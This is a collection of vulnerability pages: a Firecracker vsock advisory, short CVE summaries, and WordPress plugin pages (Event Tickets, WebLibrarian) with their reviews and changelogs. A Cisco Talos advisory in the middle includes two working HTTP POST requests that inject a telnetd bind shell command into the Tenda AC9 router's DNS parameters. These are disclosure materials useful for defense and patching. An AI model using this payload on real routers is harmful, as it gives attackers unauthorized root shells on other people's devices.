Firecracker vsock implementation buffer overflow in versions 0.18.0 and 0.19.0. This can result in potentially exploitable crashes.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 10 Dec 2019 11:30:58 +1100
From: <sandreim@...zon.com>
To: <oss-security@...ts.openwall.com>
CC: "Anthony Liguori (aliguori)" <aliguori@...zon.com>
Subject: CVE-2019-18960: Firecracker v0.18.0 and v0.19.0 vsock buffer overflow

We have identified an issue in the Firecracker v0.18.0 and v0.19.0 vsock
implementation.

# Issue Description

A logical error in bounds checking performed on vsock virtio descriptors
can be used by a malicious guest to read from and write to a segment of
the host-side Firecracker process' heap address space, directly after
the end of a guest memory region. For reads, the accessible segment's
size is 64 KiB. For writes, the accessible segment is limited by the
host Linux kernel to a size defined in /proc/sys/net/core/rmem\_max. We
expect the value of rmem\_max to be on the order of a few hundred KiB to
a few MiB.

# Impact

This will generally result in a segmentation fault, but remote code
execution within the Firecracker host-side process context cannot be
ruled out.

# Vulnerable Systems

Only Firecracker v0.18.0 and v0.19.0 are affected. Only Firecracker
microVMs with configured vsock devices are affected, and only if one or
more vsock devices are in active use by both host and guest.

# Mitigation

Patched binaries for the affected versions have been released as
Firecracker v0.18.1 \[1\] and Firecracker v0.19.1 \[2\].
If you are using Firecracker v0.18.0 or v0.19.0 , we recommend you apply
the provided fix. If you are using Firecracker v0.17.0 or below, you do
not need to take any action.
In a remote code execution scenario, users running Firecracker in line
with the recommended Production Host Setup will see the impact limited
as follows: a malicious microVM guest that would manage to compromise
the Firecracker VMM process would be restricted to running on the host
as an unprivileged user, in a chroot and mount namespace isolated from
the host's filesystem, in a separate pid namespace, in a separate
network namespace, with system calls limited to Firecracker's seccomp
whitelist, on a single NUMA node, and on a cgroups-limited number of CPU
cores.

\[1\] https://github.com/firecracker-microvm/firecracker/releases/tag/v0.18.1
\[2\] https://github.com/firecracker-microvm/firecracker/releases/tag/v0.19.1

Best Regards,
Andrei on behalf of the Firecracker maintainers team.




Amazon Development Center (Romania) S.R.L. registered office: 27A Sf. Lazar Street, UBC5, floor 2, Iasi, Iasi County, 700045, Romania. Registered in Romania. Registration number J22/2621/2005.

**Download attachment "**pEpkey.asc**" of type "**application/pgp-keys**" (2465 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2019-18960: security - CVE-2019-18960: Firecracker v0.18.0 and v0.19.0 vsock buffer overflow

In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/hid/usbhid/hiddev.c driver, aka CID-9c09b214f30e.

CVE-2019-19527

Kentico before 12.0.50 allows file uploads in which the Content-Type header is inconsistent with the file extension, leading to XSS.

CVE-2019-19493: Hotfixes

An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16multiTRU). A specially crafted HTTP POST request can cause a command injection in the DNS1 post parameters, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.

**Summary**

An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16\_multi\_TRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.

**Tested Versions**

AC9V1.0 Firmware V15.03.05.16\_multi\_TRU AC9V1.0 Firmware V15.03.05.14\_EN

**Product URLs**

AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router

**CVSSv3 Score**

7.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78: Improper Neutralization of Special Elements usedin an OS Command (‘OS Command Injection’)

**Details**

Tenda AC9 is one of the popular and low cost Smart Dual-Band Gigabit WiFi Router available on many of the online shopping sites like Amazon.

There exists command injection vulnerability in /goform/WanParameterSetting resource. Local authenticated attacker can include arbritary commands to post parameters to execute commands on the Tenda AC9 routerThe attacker can get reverse shell running as root using this commnad injection.

**CVE-2019-5071 - Command injection in the DNS1 post parameters**

The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.

The exploitable POST request is shown below

     POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
     Host: 10.10.10.1
     Content-Length: 193
     Accept: */*
     Origin: http://10.10.10.1
     X-Requested-With: XMLHttpRequest
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Referer: http://10.10.10.1/main.html
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
     Connection: close
    
     wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns2=8.8.8.8&dns1=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
    

**CVE-2019-5072 - Command injection in the DNS2 post parameters**

The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.

The exploitable POST request is shown below

     POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
     Host: 10.10.10.1
     Content-Length: 193
     Accept: */*
     Origin: http://10.10.10.1
     X-Requested-With: XMLHttpRequest
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Referer: http://10.10.10.1/main.html
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
     Connection: close
    
     wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns1=8.8.8.8&dns2=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
    

**Timeline**

2019-07-29 - Initial contact  
2019-08-07 - Sent plain text file  
2019-10-02 - 60+ day follow up  
2019-10-21 - 90 day follow up  
2019-11-21 - Public Release

Discovered by Amit N. Raut of Cisco Talos.

CVE-2019-5071: TALOS-2019-0861 || Cisco Talos Intelligence Group

Amazon FreeRTOS up to and including v1.4.8 lacks length checking in prvProcessReceivedPublish, resulting in untargetable leakage of arbitrary memory contents on a device to an attacker. If an attacker has the authorization to send a malformed MQTT publish packet to an Amazon IoT Thing, which interacts with an associated vulnerable MQTT message in the application, specific circumstances could trigger this vulnerability.

**Ending Support for Internet Explorer**

Got it

AWS support for Internet Explorer ends on 07/31/2022. Supported browsers are Chrome, Firefox, Edge, and Safari. Learn more »

Got it

CVE-2019-13120: FreeRTOS Security Updates

CSV injection in the event-tickets (Event Tickets) plugin before 4.10.7.2 for WordPress exists via the "All Post> Ticketed > Attendees" Export Attendees feature.

*   Details
*   Reviews
*   Installation
*   Development

Sell tickets and collect RSVPs with the free Event Tickets plugin, from the team behind the number one calendar in WordPress.

This plugin makes it easy to sell tickets, collect registrations, and manage attendees for your in-person or virtual events. Plus, it comes with features backed by our world-class team of developers and designers. Easily integrate Event Tickets with your Stripe account or PayPal business account.

Connect to Stripe and take advantage of one of the world’s most popular payment gateways. Our Stripe integration lets you accept credit card payments on your website, along with additional payment methods including AfterPay, ClearPay, AliPay, Giropay, and Klarna.

See more videos on our YouTube channel

Easily connect to PayPal without any complicated API keys or code through our quick connection wizard in your WordPress backend. With just a few clicks, you can begin selling tickets and enable payment through PayPal, Venmo, and credit cards.

Even more, you can upgrade to Event Tickets Plus and unlock additional payment methods including digital wallets like ApplePay and Google Pay through Stripe, or use WooCommerce to take advantage of popular payment solutions including Braintree, Square, AmazonPay, and more.

**🎟️ Ticketing and Registration for WordPress**

See Event Tickets in action on our demo site. Just getting started? Check out the Getting Started Guide for an introduction to features, settings, and functionality.

Looking for additional features like custom registration fields, QR check-in, Zoom integration, and more? **Check out Event Tickets Plus and our other add-ons**.

**🔌🎨 Plug and Play or Customize**

Event Tickets is built to work out of the box. Just install the plugin, configure your settings, and start collecting RSVPs and selling tickets in minutes.

Add your own touch by using Event Tickets as the foundation for customization. Personalize to your heart’s content with the help of a skeleton stylesheet, partial template overrides, template tags, hooks and filters, careful documentation, and a library of free extensions.

Whether your vision is big or small, you’re in good company. Thousands of small businesses, musicians, venues, restaurants, and non-profits are increasing revenue from their in-person and virtual events with Event Tickets. Our plugins have also been scaled to work on large networks for Fortune 100 companies, universities, and government institutions.

**✨ Features**

✔️ Attendees can purchase tickets to events  
✔️ Attendees can RSVP to events  
✔️ Sell tickets with PayPal and/or Stripe using our free commerce solution, Tickets Commerce.  
✔️ Add RSVPs and tickets to posts, pages, or custom post types  
✔️ Collect ticket fees by connecting your PayPal business or Stripe account  
✔️ Generate sales and attendee reports  
✔️ Ticket stock countdown  
✔️ Automatic ticket confirmation emails  
✔️ Works out of the box with The Events Calendar  
✔️ Responsive design works on all devices  
✔️ Tested on the major theme frameworks such as Avada, Genesis, Kadence, Thesis and many more.  
✔️ Internationalized & translated  
✔️ Extensive template tags for customization  
✔️ Hooks & filters galore  
✔️ Library of extensions

Upgrade to Event Tickets Plus for full WooCommerce integration to use additional payment gateways.

**📃 Documentation**

All of our documentation can be found in our knowledgebase.

Additional helpful links:

*   Guide: Getting Started with Event Tickets
*   Installing Event Tickets Video
*   Using Tickets Commerce Video
*   Do I need Event Tickets or Event Tickets Plus?
*   How to Make Money with Virtual Events
*   Implementing Stripe on Event Tickets and Event Tickets Plus

If you have any questions about this plugin, you can post a thread in the WordPress.org forum. Please search existing threads before starting a new on

**➕ Add-Ons**

Take your calendar to the next level by pairing it with our plugins for ticketing, crowdsourcing, email marketing, and more. Learn more about all our products on our website.  
Our Free Plugins:  
📅 The Events Calendar  
📐 Advanced Post Manager

Our Premium Plugins and Services:

⚡ Events Calendar Pro  
↪️ Event Aggregator (service)  
🎟️ Event Tickets Plus  
✉️ Promoter  
👥 Community Events  
🎟️ Community Tickets  
✏️ Filter Bar  
🗓️ Eventbrite Tickets  
📡 Virtual Events

**Help**

If you aren’t familiar with Event Tickets, check out our Getting Started Guide. It will have you creating tickets in no time.

Ready to dig deeper? Check out these resources:

*   Tutorials
*   Known Issues
*   Help Videos
*   Release Notes

We check in on the Event Tickets forum here on WordPress.org about once a week to help users with basic troubleshooting and identifying bugs. If you’re looking for premium, personalized support, consider upgrading to Event Tickets Plus.

Still have a question? Shoot us an email at support@theeventscalendar.com.

**Translate**

Event Tickets is translated into multiple languages, including German, Danish, and Dutch. Help localize Event Tickets even further by adding your locale – visit translate.wordpress.org.

1.  From the dashboard of your site, navigate to Plugins –> Add New.
2.  Select the Upload option and hit “Choose File.”
3.  When the popup appears select the event-tickets.x.x.zip file from your desktop. (The ‘x.x’ will change depending on the current version number).
4.  Follow the on-screen instructions and wait as the upload completes.
5.  When it’s finished, activate the plugin via the prompt. A message will show confirming activation was successful.
6.  For access to new updates, make sure you have added your valid License Key under Tickets –> Settings –> Licenses.

**Are there any troubleshooting steps I should try before I post a new thread in the support forum?**

First, make sure that you’re running the latest version of Event Tickets. If you’ve got any other add-ons, make sure those are current and running the latest code as well. Also be sure to check our knowledgebase.

The most common issues we see are either plugin or theme conflicts. You can test if a plugin or theme is conflicting by manually deactivating other plugins until just Event Tickets is running on your site. If the issue persists, revert to the default Twenty Twenty theme. If the issue is resolved after deactivating a specific plugin or your theme, you’ll know that is the source of the conflict.

Note that we aren’t going to say “tough luck” if you identify a plugin/theme conflict. While we can’t guarantee 100% integration with any plugin or theme out there, we will do our best (and reach out the plugin/theme author as needed) to figure out a solution that benefits everyone.

**I’m still stuck. Where do I go to file a bug or ask a question?**

Free plugin users can post in the Event Tickets support forum on WordPress.org. Our team reviews that forum weekly to look for bug reports.

If you’re already an Event Tickets Plus subscriber, you’re entitled to our actively-monitored Premium Support on our website. Generally, except in times of increased support loads, we reply to all premium support tickets within 24 hours during the business week.

**What’s the difference between Event Tickets and Events Tickets Plus?**

Event Tickets is our free ticketing plugin that has all the basics you need to sell tickets and collect RSVPs on your website. You can use Event Tickets with or without The Events Calendar.

Event Tickets Plus is a premium plugin that runs alongside Event Tickets and enhances it with extra features, including custom registration fields, shortcodes, WooCommerce integration, enhanced Stripe functionality for Stripe for Tickets Commerce, our mobile ticketing app and more.

Read more to learn which plugin is right for you.

**Do I need The Events Calendar to run Event Tickets?**

Nope! Event Tickets works with or without The Events Calendar. Even if you don’t have The Events Calendar, you can create RSVPs and tickets on WordPress pages and posts.

**Can I email attendees using Event Tickets?**

Yes. Event Tickets automatically sends an email confirmation after attendees register or RSVP for an event. If the attendee purchases a ticket, the confirmation email will also provide a ticket to scan at the door for admission.

**What add-ons are available for Event Tickets, and where can I read more about them?**

The following add-ons are available for The Events Calendar:

*   Events Calendar Pro, for adding premium calendar features like recurring events, advanced views, cool widgets, shortcodes, additional fields, and more!
*   Event Aggregator, a service that effortlessly fills your calendar with events from Meetup, Google Calendar, iCalendar, Eventbrite, CSV, and ICS.
*   Virtual Events, which optimizes your calendar for virtual events including Zoom integration, video and livestream embeds, SEO optimization for online events and more.
*   Event Tickets Plus, which allows you to sell tickets for your events using your favorite e-commerce platform.
*   Promoter, automated email communication made just for The Events Calendar and Event Tickets. Stay in touch with your attendees every step of the way.
*   Community Events, for allowing frontend event submission from your readers.
*   Community Tickets, which allows event organizers to sell tickets to the events they submit via Community Events.
*   Filter Bar, for adding advanced frontend filtering capabilities to your events calendar.
*   Eventbrite Tickets, for selling tickets to your event directly through Eventbrite.

**I have a feature idea. What’s the best way to tell you about it?**

We’ve got a LoopedIn page where we’re actively watching for feature ideas from the community. Vote up existing feature requests or add your own, and help us shape the future of the products business in a way that best meets the community’s needs.

**I’ve still got questions. Where can I find answers?**

Check out our extensive knowledgebase for articles on using, tweaking, and troubleshooting our plugins.

Both my client and myself are very disappointed with the modernization process of TEC + Tickets Pro to the Block Editor. Every step has been painful for over 6 months. We’ll be replacing this with a competing plugin.

Email support was good. Apart from referring to the manuals, as they should, they still investigated further and gave us a solution for our problem. Well done!

So many bug when it comes to payment and support is so so so slow. I am losing sales because to this. Using Stripe: Apple pay freezes No Way to turn off Apple Pay, turning it off doesnt save Can't validate webhook Support keeps asking me to create a staging to test, sure, but they take a week to reply. Some support staff even told me they have no experience with apple pay and it is not their feature, i mean...come on...its right there in your setting

Followed the documentation, but cannot get Stripe to validate webhook. Read other support threads and have confirmed that everything is in order as per the documentation. I was testing out the plugin, but given the time wasted, there is no way I will continue to use it to sell tickets if the free version which includes a 2% fee doesn't work, why would I bother upgrading to the premium version. Seem to much of a risk. Also, looking at people comments, it seems support is slow (they are constantly away from the office/out of the office. Look at other plugins out there.

Constant issues. Nearly impossible to make work. Stops working for no apparent reason. I make websites, used probably hundreds of different plugins over the years. This is in the top 5 worst. There is an easy/user friendly way to do things. This plugin does the opposite in nearly every avenue.

Despite having over 18 months of warning from EDD that their plugin needed updating, they have failed to make any progress whatsoever. They use incompatible, depreciated methods which means tickets sold do not have the attendees details saved, just the purchaser. If I could give this negative stars, I would.

Read all 130 reviews

“Event Tickets and Registration” is open source software. The following people have contributed to this plugin.

Contributors

**\[5.5.8\] 2023-02-22**

*   Version – Event Tickets 5.5.8 is only compatible with The Events Calendar 6.0.10 and higher.
*   Version – Event Tickets 5.5.8 is only compatible with Event Tickets Plus 5.6.7 and higher.
*   Tweak – PHP version compatibility bumped to PHP 7.4
*   Tweak – Version Composer updated to 2
*   Tweak – Version Node updated to 18.13.0
*   Tweak – Version NPM update to 8.19.3
*   Tweak – Reduce JavaScript bundle sizes for Blocks editor

**\[5.5.7\] 2023-02-09**

*   Enhancement – Added currency format options to alter currency decimal separator, thousand separator, and number of decimal places. \[ET-1608\]
*   Tweak – Updated Currency options in Tickets Commerce settings for Croatian users from Kuna (HRK) to Euro (EUR). \[ET-1625\]
*   Tweak – Updated Attendee Registration Fields upsell notice to only display in admin dashboard. \[CT-67\]
*   Fix – Resolve provisional IDs properly on the event edit screen for ticket management actions. \[ET-1632\]
*   Fix – Fixed Ticket Commerce cart cookies not getting saved. \[ET-1629\]
*   Language – 28 new strings added, 189 updated, 5 fuzzied, and 3 obsoleted

**\[5.5.6\] 2023-01-16**

*   Tweak – Updated the settings description for stock handling options. \[ET-1603\]
*   Tweak – Added the tribe-tickets__tickets-item--shared-capacity wrapper class for tickets having shared capacity. \[ETP-841\]
*   Tweak – Added a dashboard notice for sites running PHP versions lower than 7.4 to alert them that the minimum version of PHP is changing to 7.4 in February 2023.
*   Enhancement – Added search capabilities to the Tickets Commerce Orders report page. \[ET-1259\]
*   Fix – Allow loading attendance page with event_id params that use The Events Calendar provisional IDs. \[ET-1624\]
*   Language – 4 new strings added, 43 updated, 0 fuzzied, and 2 obsoleted

**\[5.5.5\] 2022-12-08**

*   Fix – Remove need for Platform Controls to verify webhook signatures in Stripe. \[ET-1508\]
*   Fix – Fixed the order of tickets in an event changing when you haven’t manually requested it. \[ET-1568\]
*   Fix – Fixed shared capacity tickets only showing the lowest capacity between the shared pool tickets. \[ETP-815\]
*   Tweak – Removed locale param for Tickets Commerce JS SDK as per PayPal recommendation. \[ET-1615\]
*   Language – 110 new strings added, 193 updated, 5 fuzzied, and 24 obsoleted

**\[5.5.4\] 2022-11-09**

*   Fix – Fixes multiple of the same ticket form being on the same page being out of sync. \[GTRIA-729\]
*   Fix – Added a JS event that checks for attendee label validation if ET+ is active. \[ETP-803\]

**\[5.5.3\] 2022-10-31**

*   Fix – Orderby param not working for Attendee archive REST API. \[ET-1591\]
*   Fix – Properly save the check-in details for attendees on check-in. \[ETP-819\]
*   Fix – TicketsCommerce ticketed events not showing up for Events REST API. \[ET-1567\]
*   Fix – Update version of Firebase/JWT in Common from 5.x to 6.3.0
*   Enhancement – Added support for name and email param for searching in Attendee archive REST API. \[ET-1591\]
*   Enhancement – Add template tag to properly check if The Events Calendar is active. \[ETP-820\]
*   Enhancement – Add attendance information to the events REST API endpoint. \[ET-1580\]
*   Enhancement – Add check_in argument support for attendees REST API endpoint. \[ET-1588\]
*   Language – 0 new strings added, 18 updated, 0 fuzzied, and 0 obsoleted

**\[5.5.2\] 2022-10-20**

*   Fix – Update version of Firebase/JWT in Common from 5.x to 6.3.0

**\[5.5.1\] 2022-09-22**

*   Fix – Listing tickets is no longer limited by the global settings. \[ET-1584\]
*   Fix – Correct parameter type hinting when param can be null. \[ET-1582\]
*   Fix – Showing Checkout not available and credit card fields at the same time for PayPal gateway in TicketsCommerce. \[ETP-812\]
*   Language – 0 new strings added, 1 updated, 0 fuzzied, and 0 obsoleted

**\[5.5.0\] 2022-09-06**

*   Version – Event Tickets 5.5.0 is only compatible with The Events Calendar 6.0.0 and higher.
*   Version – Event Tickets 5.5.0 is only compatible with Event Tickets Plus 5.6.0 and higher.
*   Enhancement – Adds a compatibility layer to work with the new Recurrence Backend Engine in TEC/ECP.
*   Language – 4 new strings added, 49 updated, 0 fuzzied, and 3 obsoleted

See changelog for all versions

CVE-2019-16120: Event Tickets and Registration

The ad-inserter plugin before 2.4.20 for WordPress has path traversal.

CVE-2019-15323: Ad Inserter – Ad Manager & AdSense Ads

The weblibrarian plugin before 3.4.8.6 for WordPress has XSS via front-end short codes.

*   Details
*   Reviews
*   Installation
*   Development

This WordPress plugin started as a portable, cross-platform system that  
the Wendell Free Library could use as a transition system from its current  
paper card based circulation system to the system that will eventually  
be rolled out by the regional library system. It has ‘morphed’ to a  
web-based successor to Deepwoods Software’s Home Librarian 3 system.

This plugin implements a simple and basic, web-based, library catalog  
and circulation system. There are short codes that can be added to  
pages of a WordPress site to search and display items in the library  
collection. And there are back-end (admin) pages that implement  
management of the collection, management of patrons (users) of the  
library, as well as implementing the functionality of a circulation  
desk.

The plugin can be installed by uploading the Zip file to the plugin  
installer or unpacking the zip file under the plugins directory.

There are some options that can be set, but these options are not needed  
for basic operation. There are three short codes that can be added to  
pages or posts for front end searching and display of your library  
collection and there are a number of back-end (dashboard) pages for all  
of the management of your library.

Please read the PDF User Manual (also available in  
Italian) for complete documentation on using this plugin. This  
is a fairly non-trivial plugin, and there is not a simple quick-start guide  
for the impatient. The user manual files are 1548805 bytes long for the  
Italian version and 1548666 for the Englist version and MD5 sums are  
available. If you are having trouble opening the PDFs,  
please check the size and the MD5Sum. If the size is right and the MD5Sum is  
right, try another PDF viewer.

Support is handled either with \[Deepwoods Software’s Bugzilla\]\[bugreport\]  
(submit any bugs and feature requests to the Bugzilla) or though the  
\[Deepwoods Software’s Support page\]\[support\] (use this for comments or  
for general questions).

You’ve successfully installed the Web Librarian, but none of the admin  
menus (Patrons, Collection, Circulation Types, Circulation Desk, or  
Circulation Stats) show up. Why is this? This is because you are  
probably logged in as the web site administrator (your user role is  
Administrator). You need to create at least a user with a user role of  
Librarian and then log in as this user. Optionally, you can also  
create users with roles of Senior Aid or Volunteer, who have lesser  
privileges — these latter users make sense if you are a large enough  
library that has additional staff (“Senior Aid”) or uses additional  
workers (“Volunteer”) who man the circulation desk(s). It is important  
to read the subsection titled “User Role Setup” in the “Installation and  
basic setup” section _carefully_ and to be sure you understand it fully.

**Which stylesheet (CSS) selectors can I use to modify the appearance of the front end?**

This is described in the appendix of the user manual.

**I am having a problem with the bulk upload.**

Here are some tips relating to problems with bulk uploading a collection:

If you export a CSV file from Excel (and probably other ‘modern’ spreadsheet  
programs as well), you should check the resulting CSV file with a _plain text_  
editor. Things to look for include extra commas at the ends of lines  
(‘phantom’ or empty columns) and strange characters, partitularly in the  
headings and in barcodes (if you using your own barcodes).

Other issues involving issues with newline characters. Most of the time  
WordPress will be running on a LAMP server (a Linux machine). Linux uses the  
linefeed character (ASCII 10, Ctrl-j) as newline character. MS-Windows uses a  
two character sequence for newlines: carriage return (ASCII 13, Ctrl-m)  
followed by a linefeed (ASCII 10, Ctrl-j). MacOSX uses just a carriage  
return (ASCII 13, Ctrl-m). Web browsers are _supposed_ to normalize uploaded  
plain text files, but sometimes this does not happen. It might be necessary  
to fix things in advance of uploading.

Finally, try your upload in _small_ chunks, at least until you get the process  
worked out. Remember that most WordPress (PHP) installs have a limit on the  
maximum size of uploaded files, so a really large database is going to have be  
uploaded in chunks anyway.

**How do I check an item out?**

In order to check an item out, you need to load a patron record into the  
circulation desk page. You can use the “Find Patron” button to search the  
patrons by name and then select the proper result from the list of results  
in the drop down and then click the “Lookup Patron” to load that patron’s  
record. You can then enter the item’s barcode in the item barcode field and  
click the “Checkout” button. It is possible to pre-load the item barcode  
field before looking up the patron.

**Search does not work – sends me back to my home page**

This is caused by a conflict with permalinks and form handling. Answered in  
the support forum on the WordPress site:

https://wordpress.org/support/topic/search-doesnt-work-7

I’d suggest this solution:

Change your site’s permalink settings: on the dashboard select  
Settings->permalinks, then select something other than the ‘default’.

**I cannot open the user manual, it appears to be corrupt**

Please check the size of the PDF (1548805 for user\_manual\_IT.pdf and 1548666  
for user\_manual.pdf) and also check the MD5 sum to make  
sure you properly downloaded the file. The correct download urls are:

User Manual (English):  
https://plugins.svn.wordpress.org/weblibrarian/assets/user\_manual/user\_manual.pdf

User Manual (Italian):  
https://plugins.svn.wordpress.org/weblibrarian/assets/user\_manual/user\_manual\_IT.pdf

**Something does not work. What should I do?**

Submit a bug at \[Deepwoods Software’s Bugzilla\]\[bugreport\].

**I have another question that is not listed here. What should I do?**

Submit one on Deepwoods Software’s Support page. You can  
also submit a documentation bug at Deepwoods Software’s Bugzilla  
as well.

Dear Robert, Truly value your exertion in making this module. Good to run an online library. We have effectively setup and propelled a free online library for our group. Great work. We created a new theme on your work and its all thanks to your work. Web Librarian Much thanks 🙂

As a non-lending family history society, we wanted a plugin which would enable members to search the library catalogue and display results. We did not require the circulation side of it as we don't lend materials. We also wanted the ability to enter the category and subject so have added those to the database\_code\_php so that the librarian can select from each without having to retype every time. The librarian can export to a CSV file (already provided), and can now search the collection using Title, ISBN, Keyword, Call Number etc and sort on those headings as well. This has the bones of a good program for our needs and I had searched long and hard before downloading this one.

I tried loading this onto a subdomain site with the theme ‘Evolve'. Each time the plugin uploaded and activated, but soon as I added a library user the subdomain site and my main site froze. I had to delete the plugin in order to restore. Maybe this is a good plugin but not for me. I have no option but to look for an alternative.

Read all 12 reviews

“WebLibrarian” is open source software. The following people have contributed to this plugin.

Contributors

*    Robert Heller

**3.5.8.1**

Updated .pot file.

**3.5.8**

Minor bug fixes.

**3.5.7**

Fixed collection sorting.

**3.5.6**

Fixed missing ; in short\_codes.php.

**3.5.5**

Fix CVE-2019-1010034.

**3.5.4**

Add loading of base jQuery, in case the theme does not load it.

**3.5.3**

Perform length check and truncation in WEBLIB\_ItemInCollection::upload\_csv().

**3.5.2**

Removed extra dollar sign in database\_code.php.

**3.5.1**

Small bug — fix small edit error in WEBLIB\_AdminPages constructor.

**3.5**

Changed the localization slug from web-librarian to weblibrarian to conform  
with https://make.wordpress.org/meta/handbook/documentation/translations/

**3.4.8.7**

Fix yet another XSS problem in front end short codes.

**3.4.8.6**

Fix additional XSS problems in front end short codes.

**3.4.8.5**

Fix XSS problem in front end short codes.

**3.4.8.4**

Fix pubdate error in short codes.

**3.4.8.3**

Corrected ordering of fields in long format short code.

**3.4.8.2**

*   Make date display and entry in forms consistent.

**3.4.8.1**

*   Remove USA specific State check (required two letter state).

**3.4.8**

*   Relaxed the State, Zip, and Telephone fields of patrons to allow for non-USA users.

**3.4.7**

*   Fix small error handling code in WEBLIB\_Patrons\_Admin.php.

**3.4.6**

*   Changed to use PHP5 constructors in Widget classes (WP\_Widget).

**3.4.5**

*   Changed split() in includes/WEBLIB\_Patrons\_Admin.php to explode().

**3.4.4**

*   Added Czech language files.

**3.4.3**

*   Added Brazilian Portugese language module.

**3.4.2**

*   Minor bugfix for Patron Short Codes: removed unused functions and removed  
    references to undefined members (leftovers from copying ListTable code from  
    Admin land).

**3.4.1**

*   Added check for patron insertion falure.

**3.4**

*   Added short codes to put patron edit functions on the front side: editing  
    patron contact info along with hold and circs handling. This allows use with  
    plugins like WooCommerce that redirect away from the “normal” WP Admin  
    Dashboard.

**3.3**

*   Secure data export code: convert to use admin-post.php.
*   Secure AWS code: convert to use admin-post.php and admin-ajax.php
*   Move AJAX code to proper WP coding (using admin\_ajax.php).

**3.2.10.14**

*   Add ‘view\_admin\_dashboard’ cap. to Librarian, Senior Aid, and Volunteer, to allow usage with WooCommerce.

**3.2.10.13**

*   Fix minor error (wrong scope for WEBLIB\_Circulation\_Admin::single\_row\_columns()).

**3.2.10.12**

*   Add auto truncation of collection fields to prevent database errors.

**3.2.10.11**

*   Fix minor error (wrong scope for WEBLIB\_Circulation\_Admin::get\_column\_info()).

**3.2.10.10**

*   Fix minor error (unset variable).

**3.2.10.9**

*   Fix errors in cirlist code (fun with changed WP\_List api…).

**3.2.10.8**

*   Moved URL defines to the constructor. And updated tested to version.

**3.2.10.7**

*   Fix incrstring — MySQL uses case folded compares for unique string keys!

**3.2.10.6**

*   Add wildcards to username search in add patron id.

**3.2.10.5**

*   Fix small bug in Add Patron ID page: wrong page id in search form.

**3.2.10.4**

*   Minor stylesheet fix (#overdue => span.overdue).

**3.2.10.3**

*   Minor documentation update.

**3.2.10.1**

*   Handle Excel extra column stupidity.

**3.2.10**

*   Fix problems with generated barcodes during bulk uploads.

**3.2.9.9**

*   Include medium and large image in AWS item loopup and make them available for insertion

**3.2.9.8**

*   Fix bug in autobarcode generator code. (Stupid SQL ‘order by’!).

**3.2.9.7**

*   Updated AWS Locale endpoints.

**3.2.9.6**

*   Fix missing name attribute in short code.

**3.2.9.5**

*   Remove two small short tags.

**3.2.9.4**

*   Comment out ALL debug code (silly IIS).

**3.2.9.3**

*   Fix minor bug in patron admin code (wrong page name).

**3.2.9.2**

*   Workaround for missing localization function (nl\_langinfo()).
*   Fix missing localization function call (missing \_’s).

**3.2.9.1**

*   Fix typo in the readme.txt file.

**3.2.9**

*   Contextual help translated to Italian (completed).

**3.2.8.3**

*   Update when styles are enqueued.
*   Contextual help translated to Italian (in progress).

**3.2.8.2**

*   Updated readme: Fixed Changelog section (too many =’s!).  
    Added link for user manual (in English and Italian).
*   Updated user manual to include style sheet information for front side  
    styling.

**3.2.8.1**

*   Added hook to allow for localized contextual help.
*   Fixed minor localization bug.

**3.2.8**

*   Move user manual to assets.
*   Small fix to options page: allow for blank AWS options.

